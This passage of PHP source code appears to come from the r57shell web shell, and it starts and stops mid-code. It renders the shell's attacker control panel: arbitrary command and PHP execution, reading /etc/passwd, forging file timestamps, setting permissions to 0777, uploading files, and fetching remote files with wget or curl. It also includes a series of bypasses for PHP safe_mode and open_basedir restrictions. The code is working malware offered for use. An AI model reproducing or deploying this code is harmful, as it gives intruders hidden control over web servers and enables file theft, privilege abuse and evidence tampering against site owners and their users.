} else if ($fp || @function_exists('file_put_contents')) {
foreach ($sql->dump as $v) {
@fwrite($fp, $v . "\r\n") or @fputs($fp, $v . "\r\n") or @file_put_contents($_POST['dif_name'], $v . "\r\n");
}
} else {
echo "[-] ERROR! Can't write in dump file";
}
}
}
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";
function div_title($title, $id) {
return '<a style="cursor: pointer;" onClick="change_divst(\'' . $id . '\');">' . $title . '</a>';
}
function div($id) {
if (isset($_COOKIE[$id]) && ($_COOKIE[$id] == 0)) return '<div id="' . $id . '" style="display: none;">';
$divid = array('id5', 'id6', 'id8', 'id9', 'id10', 'id11', 'id16', 'id24', 'id25', 'id26', 'id27', 'id28', 'id29', 'id33', 'id34', 'id35', 'id37', 'id38');
if (empty($_COOKIE[$id]) && @in_array($id, $divid)) return '<div id="' . $id . '" style="display: none;">';
return '<div id="' . $id . '">';
}
if (!$safe_mode) {
echo $fs . $table_up1 . div_title($lang[$language . '_text2'], 'id1') . $table_up2 . div('id1') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text3'] . $arrow . "</b>", in('text', 'cmd', 85, ''));
echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'dir', 85, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1']));
echo $te . '</div>' . $table_end1 . $fe;
} else {
echo $fs . $table_up1 . div_title($lang[$language . '_text28'], 'id2') . $table_up2 . div('id2') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'dir', 85, $dir) . in('hidden', 'cmd', 0, 'safe_dir') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt6']));
echo $te . '</div>' . $table_end1 . $fe;
}
echo $fs . $table_up1 . div_title($lang[$language . '_text42'], 'id3') . $table_up2 . div('id3') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text43'] . $arrow . "</b>", in('text', 'e_name', 85, $dir) . in('hidden', 'cmd', 0, 'edit_file') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt11']));
echo $te . '</div>' . $table_end1 . $fe;
if ($safe_mode || $open_basedir) {
echo $fs . $table_up1 . div_title($lang[$language . '_text57'], 'id4') . $table_up2 . div('id4') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text58'] . $arrow . "</b>", in('text', 'mk_name', 54, (!empty($_POST['mk_name']) ? ($_POST['mk_name']) : ("new_name"))) . ws(4) . "<select name=action><option value=create>" . $lang[$language . '_text65'] . "</option><option value=delete>" . $lang[$language . '_text66'] . "</option></select>" . ws(3) . "<select name=what><option value=file>" . $lang[$language . '_text59'] . "</option><option value=dir>" . $lang[$language . '_text60'] . "</option></select>" . in('hidden', 'cmd', 0, 'mk') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt13']));
echo $te . '</div>' . $table_end1 . $fe;
}
if ($unix && @function_exists('touch')) {
echo $fs . $table_up1 . div_title($lang[$language . '_text128'], 'id5') . $table_up2 . div('id5') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text43'] . $arrow . "</b>", in('text', 'file_name', 40, (!empty($_POST['file_name']) ? ($_POST['file_name']) : ($dir . "/r57shell.php"))) . ws(4) . "<b>" . $lang[$language . '_text26'] . ws(2) . $lang[$language . '_text59'] . $arrow . "</b>" . ws(2) . in('text', 'file_name_r', 40, (!empty($_POST['file_name_r']) ? ($_POST['file_name_r']) : (""))));
echo sr(15, "<b> or set Day" . $arrow . "</b>", '
<select name="day" size="1">
<option value="01">1</option>
<option value="02">2</option>
<option value="03">3</option>
<option value="04">4</option>
<option value="05">5</option>
<option value="06">6</option>
<option value="07">7</option>
<option value="08">8</option>
<option value="09">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>' . ws(4) . "<b>Month" . $arrow . "</b>" . '
<select name="month" size="1">
<option value="January">January</option>
<option value="February">February</option>
<option value="March">March</option>
<option value="April">April</option>
<option value="May">May</option>
<option value="June">June</option>
<option value="July">July</option>
<option value="August">August</option>
<option value="September">September</option>
<option value="October">October</option>
<option value="November">November</option>
<option value="December">December</option>
</select>' . ws(4) . "<b>Year" . $arrow . "</b>" . '
<select name="year" size="1">
<option value="1998">1998</option>
<option value="1999">1999</option>
<option value="2000">2000</option>
<option value="2001">2001</option>
<option value="2002">2002</option>
<option value="2003">2003</option>
<option value="2004">2004</option>
<option value="2005">2005</option>
<option value="2006">2006</option>
<option value="2006">2007</option>
<option value="2006">2008</option>
<option value="2006">2009</option>
<option value="2006">2010</option>
</select>' . ws(4) . "<b>Hour" . $arrow . "</b>" . '
<select name="chasi" size="1">
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
</select>' . ws(4) . "<b>Minute" . $arrow . "</b>" . '
<select name="minutes" size="1">
<option value="01">1</option>
<option value="02">2</option>
<option value="03">3</option>
<option value="04">4</option>
<option value="05">5</option>
<option value="06">6</option>
<option value="07">7</option>
<option value="08">8</option>
<option value="09">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
<option value="32">32</option>
<option value="33">33</option>
<option value="34">34</option>
<option value="35">35</option>
<option value="36">36</option>
<option value="37">37</option>
<option value="38">38</option>
<option value="39">39</option>
<option value="40">40</option>
<option value="41">41</option>
<option value="42">42</option>
<option value="43">43</option>
<option value="44">44</option>
<option value="45">45</option>
<option value="46">46</option>
<option value="47">47</option>
<option value="48">48</option>
<option value="49">49</option>
<option value="50">50</option>
<option value="51">51</option>
<option value="52">52</option>
<option value="53">53</option>
<option value="54">54</option>
<option value="55">55</option>
<option value="56">56</option>
<option value="57">57</option>
<option value="58">58</option>
<option value="59">59</option>
</select>' . ws(4) . "<b>Second" . $arrow . "</b>" . '
<select name="second" size="1">
<option value="01">1</option>
<option value="02">2</option>
<option value="03">3</option>
<option value="04">4</option>
<option value="05">5</option>
<option value="06">6</option>
<option value="07">7</option>
<option value="08">8</option>
<option value="09">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
<option value="32">32</option>
<option value="33">33</option>
<option value="34">34</option>
<option value="35">35</option>
<option value="36">36</option>
<option value="37">37</option>
<option value="38">38</option>
<option value="39">39</option>
<option value="40">40</option>
<option value="41">41</option>
<option value="42">42</option>
<option value="43">43</option>
<option value="44">44</option>
<option value="45">45</option>
<option value="46">46</option>
<option value="47">47</option>
<option value="48">48</option>
<option value="49">49</option>
<option value="50">50</option>
<option value="51">51</option>
<option value="52">52</option>
<option value="53">53</option>
<option value="54">54</option>
<option value="55">55</option>
<option value="56">56</option>
<option value="57">57</option>
<option value="58">58</option>
<option value="59">59</option>
</select>' . in('hidden', 'cmd', 0, 'touch') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1']));
echo $te . '</div>' . $table_end1 . $fe;
}
$select = '';
if (@function_exists('chmod')) {
$select.= "<option value=mod>CHMOD</option>";
}
if (@function_exists('chown')) {
$select.= "<option value=own>CHOWN</option>";
}
if (@function_exists('chgrp')) {
$select.= "<option value=grp>CHGRP</option>";
}
if ($unix && $select) {
echo $fs . $table_up1 . div_title($lang[$language . '_text67'], 'id6') . $table_up2 . div('id6') . $ts;
echo @sr(15, "<b>" . $lang[$language . '_text43'] . $arrow . "</b>", in('text', 'param1', 55, (($_POST['param1']) ? ($_POST['param1']) : ($dir . "/r57shell.php"))) . ws(2) . "<b>" . $lang[$language . '_text68'] . $arrow . "</b>" . "<select name=what>" . $select . "</select>" . ws(4) . in('text', 'param2 title="' . $lang[$language . '_text71'] . '"', 10, (($_POST['param2']) ? ($_POST['param2']) : ("0777"))) . in('hidden', 'cmd', 0, 'ch_') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (!$safe_mode) {
$aliases2 = '';
foreach ($aliases as $alias_name => $alias_cmd) {
$aliases2.= "<option>$alias_name</option>";
}
echo $fs . $table_up1 . div_title($lang[$language . '_text7'], 'id7') . $table_up2 . div('id7') . $ts;
echo sr(15, "<b>" . ws(9) . $lang[$language . '_text8'] . $arrow . ws(4) . "</b>", "<select name=alias>" . $aliases2 . "</select>" . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1']));
echo $te . '</div>' . $table_end1 . $fe;
}
echo $fs . $table_up1 . div_title($lang[$language . '_text54'], 'id8') . $table_up2 . div('id8') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text52'] . $arrow . "</b>", in('text', 's_text', 85, 'text') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt12']));
echo sr(15, "<b>" . $lang[$language . '_text53'] . $arrow . "</b>", in('text', 's_dir', 85, $dir) . " * ( /root;/home;/tmp )");
echo sr(15, "<b>" . $lang[$language . '_text55'] . $arrow . "</b>", in('checkbox', 'm id=m', 0, '1') . in('text', 's_mask', 82, '.txt;.php') . "* ( .txt;.php;.htm )" . in('hidden', 'cmd', 0, 'search_text') . in('hidden', 'dir', 0, $dir));
echo $te . '</div>' . $table_end1 . $fe;
if (!$safe_mode && $unix) {
echo $fs . $table_up1 . div_title($lang[$language . '_text76'], 'id9') . $table_up2 . div('id9') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text72'] . $arrow . "</b>", in('text', 's_text', 85, 'text') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt12']));
echo sr(15, "<b>" . $lang[$language . '_text73'] . $arrow . "</b>", in('text', 's_dir', 85, $dir) . " * ( /root;/home;/tmp )");
echo sr(15, "<b>" . $lang[$language . '_text74'] . $arrow . "</b>", in('text', 's_mask', 85, '*.[hc]') . ws(1) . $lang[$language . '_text75'] . in('hidden', 'cmd', 0, 'find_text') . in('hidden', 'dir', 0, $dir));
echo $te . '</div>' . $table_end1 . $fe;
}
echo $fs . $table_up1 . div_title($lang[$language . '_text32'], 'id10') . $table_up2 . $font;
echo "<div align=center>" . div('id10') . "<textarea name=php_eval cols=100 rows=10>";
echo (!empty($_POST['php_eval']) ? ($_POST['php_eval']) : ("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
echo "</textarea>";
echo in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'php_eval');
echo "<br>" . ws(1) . in('submit', 'submit', 0, $lang[$language . '_butt1']);
echo "</div></div></font>";
echo $table_end1 . $fe;
if ($safe_mode || $open_basedir) {
echo $fs . $table_up1 . div_title($lang[$language . '_text34'], 'id11') . $table_up2 . div('id11') . $ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test2_file', 85, (!empty($_POST['test2_file']) ? ($_POST['test2_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test2') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(), "5.2.0") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text33'], 'id12') . $table_up2 . div('id12') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test1_file', 85, (!empty($_POST['test1_file']) ? ($_POST['test1_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test1') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && $mysql_on) {
echo $fs . $table_up1 . div_title($lang[$language . '_text35'], 'id13') . $table_up2 . div('id13') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text36'] . $arrow . "</b>", in('text', 'test3_md', 15, (!empty($_POST['test3_md']) ? ($_POST['test3_md']) : ("mysql"))) . ws(4) . "<b>" . $lang[$language . '_text37'] . $arrow . "</b>" . in('text', 'test3_ml', 15, (!empty($_POST['test3_ml']) ? ($_POST['test3_ml']) : ("root"))) . ws(4) . "<b>" . $lang[$language . '_text38'] . $arrow . "</b>" . in('text', 'test3_mp', 15, (!empty($_POST['test3_mp']) ? ($_POST['test3_mp']) : ("password"))) . ws(4) . "<b>" . $lang[$language . '_text14'] . $arrow . "</b>" . in('text', 'test3_port', 15, (!empty($_POST['test3_port']) ? ($_POST['test3_port']) : ("3306"))));
echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test3_file', 96, (!empty($_POST['test3_file']) ? ($_POST['test3_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test3') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && $mssql_on) {
echo $fs . $table_up1 . div_title($lang[$language . '_text85'], 'id14') . $table_up2 . div('id14') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text36'] . $arrow . "</b>", in('text', 'test4_md', 15, (!empty($_POST['test4_md']) ? ($_POST['test4_md']) : ("master"))) . ws(4) . "<b>" . $lang[$language . '_text37'] . $arrow . "</b>" . in('text', 'test4_ml', 15, (!empty($_POST['test4_ml']) ? ($_POST['test4_ml']) : ("sa"))) . ws(4) . "<b>" . $lang[$language . '_text38'] . $arrow . "</b>" . in('text', 'test4_mp', 15, (!empty($_POST['test4_mp']) ? ($_POST['test4_mp']) : ("password"))) . ws(4) . "<b>" . $lang[$language . '_text14'] . $arrow . "</b>" . in('text', 'test4_port', 15, (!empty($_POST['test4_port']) ? ($_POST['test4_port']) : ("1433"))));
echo sr(15, "<b>" . $lang[$language . '_text3'] . $arrow . "</b>", in('text', 'test4_file', 96, (!empty($_POST['test4_file']) ? ($_POST['test4_file']) : ("dir"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test4') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(), "5.2.0") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text112'], 'id15') . $table_up2 . div('id15') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test5_file', 96, (!empty($_POST['test5_file']) ? ($_POST['test5_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test5') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(), "5.2.0") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text113'], 'id20') . $table_up2 . div('id20') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'test6_file', 96, (!empty($_POST['test6_file']) ? ($_POST['test6_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test6') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(), "5.2.0") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text114'], 'id21') . $table_up2 . div('id21') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test7_file', 96, (!empty($_POST['test7_file']) ? ($_POST['test7_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test7') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(), "5.2.0") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text115'], 'id22') . $table_up2 . div('id22') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text116'] . $arrow . "</b>", in('text', 'test8_file1', 96, (!empty($_POST['test8_file1']) ? ($_POST['test8_file1']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test8'));
echo sr(15, "<b>" . $lang[$language . '_text117'] . $arrow . "</b>", in('text', 'test8_file2', 96, (!empty($_POST['test8_file2']) ? ($_POST['test8_file2']) : ($dir))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(), "5.2.0") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text120'], 'id23') . $table_up2 . div('id23') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test9_file', 96, (!empty($_POST['test9_file']) ? ($_POST['test9_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test9') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.0.0") < 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text121'], 'id24') . $table_up2 . div('id24') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'test10_file', 96, (!empty($_POST['test10_file']) ? ($_POST['test10_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test10') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(), "5.2.2") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text122'], 'id19') . $table_up2 . div('id19') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'dir', 96, (!empty($_POST['test18_file']) ? ($_POST['test18_file']) : ($dir))) . in('hidden', 'cmd', 0, 'safe_dir') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text130'], 'id25') . $table_up2 . div('id25') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text116'] . $arrow . "</b>", in('text', 'test11_file', 96, (!empty($_POST['test11_file']) ? ($_POST['test11_file']) : ("/tmp/test.zip"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test11') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text123'], 'id26') . $table_up2 . div('id26') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text116'] . $arrow . "</b>", in('text', 'test12_file', 96, (!empty($_POST['test12_file']) ? ($_POST['test12_file']) : ("/tmp/test.bzip"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test12') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(), "5.2.2") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text124'], 'id27') . $table_up2 . div('id27') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "</b>", in('text', 'test13_file2', 96, (!empty($_POST['test13_file2']) ? ($_POST['test13_file2']) : ($dir . "/shell.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test13'));
echo sr(15, "<b>" . $lang[$language . '_text125'] . $arrow . "</b>", in('text', 'test13_file1', 96, (!empty($_POST['test13_file1']) ? ($_POST['test13_file1']) : ("<? phpinfo(); ?>"))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text126'], 'id28') . $table_up2 . div('id28') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'test14_file2', 96, (!empty($_POST['test14_file2']) ? ($_POST['test14_file2']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test14'));
echo sr(15, "<b>" . $lang[$language . '_text125'] . $arrow . "</b>", in('text', 'test14_file1', 96, (!empty($_POST['test14_file1']) ? ($_POST['test14_file1']) : ("<? phpinfo(); ?>"))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(), "5.2.2") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text127'], 'id29') . $table_up2 . div('id29') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "</b>", in('text', 'test15_file2', 96, (!empty($_POST['test15_file2']) ? ($_POST['test15_file2']) : ($dir . "/shell.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test15'));
echo sr(15, "<b>" . $lang[$language . '_text125'] . $arrow . "</b>", in('text', 'test15_file1', 96, (!empty($_POST['test15_file1']) ? ($_POST['test15_file1']) : ("<? phpinfo(); ?>"))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.4") <= 0) {
echo $fs . $table_up1 . div_title($lang[$language . '_text129'], 'id16') . $table_up2 . div('id16') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "</b>", in('text', 'test16_file', 96, (!empty($_POST['test16_file']) ? ($_POST['test16_file']) : ($dir . "/test.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test16') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '</div>' . $table_end1 . $fe;
}
if (($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(), "5.2.2") <= 0) {
echo $table_up1 . div_title($lang[$language . '_text131'], 'id17') . $table_up2 . div('id17') . $ts;
echo "<tr><td valign=top width=70%>" . $ts;
echo sr(20, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", $fs . in('text', 'test17_file', 60, (!empty($_POST['test17_file']) ? ($_POST['test17_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_1') . in('submit', 'submit', 0, $lang[$language . '_text136']) . $fe);
echo $te . "</td><td valign=top width=30%>" . $ts;
echo sr(0, "", $fs . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_2') . in('submit', 'submit', 0, $lang[$language . '_butt8']) . $fe);
echo $te . "</td></tr>";
echo $te . '</div>' . $table_end1;
}
if (($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(), "5.2.2") <= 0) {
echo $table_up1 . div_title($lang[$language . '_text132'], 'id18') . $table_up2 . div('id18') . $ts;
echo "<tr><td valign=top width=70%>" . $ts;
echo sr(20, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", $fs . in('text', 'test17_file', 60, (!empty($_POST['test17_file']) ? ($_POST['test17_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_1') . in('submit', 'submit', 0, $lang[$language . '_text136']) . $fe);
echo $te . "</td><td valign=top width=30%>" . $ts;
echo sr(0, "", $fs . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_3') . in('submit', 'submit', 0, $lang[$language . '_butt8']) . $fe);
echo $te . "</td></tr>";
echo $te . '</div>' . $table_end1;
}
if ((!@function_exists('ini_get')) || @ini_get('file_uploads')) {
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo $table_up1 . div_title($lang[$language . '_text5'], 'id30') . $table_up2 . div('id30') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile0', 85, ''));
echo sr(15, "<b>" . $lang[$language . '_text21'] . $arrow . "</b>", in('checkbox', 'nf1 id=nf1', 0, '1') . in('text', 'new_name', 82, '') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2']));
echo $te . '</div>' . $table_end1 . $fe;
}
if ((!@function_exists('ini_get')) || @ini_get('file_uploads')) {
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo $table_up1 . div_title('Multy ' . $lang[$language . '_text5'], 'id34') . $table_up2 . div('id34') . $ts;
echo "<tr><td valign=top width=50%>" . $ts;
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile1', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile2', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile3', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile4', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile5', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile6', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile7', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile8', 35, ''));
echo $te . "</td><td valign=top width=50%>" . $ts;
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile9', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile10', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile11', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile12', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile13', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile14', 35, ''));
echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile15', 35, ''));
echo sr(15, '', in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2']));
echo $te . "</td></tr>";
echo $te . '</div>' . $table_end1 . $fe;
}
$select = '';
if ((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('fopen'))) {
$select = "<option value=\"fopen\">fopen</option>";
}
if (!$safe_mode) {
if (which('wget')) {
$select.= "<option value=\"wget\">wget</option>";
}
if (which('fetch')) {
$select.= "<option value=\"fetch\">fetch</option>";
}
if (which('lynx')) {
$select.= "<option value=\"lynx\">lynx</option>";
}
if (which('links')) {
$select.= "<option value=\"links\">links</option>";
}
if (which('curl')) {
$select.= "<option value=\"curl\">curl</option>";
}
if (which('GET')) {
$select.= "<option value=\"GET\">GET</option>";
}
}
if ($select) {
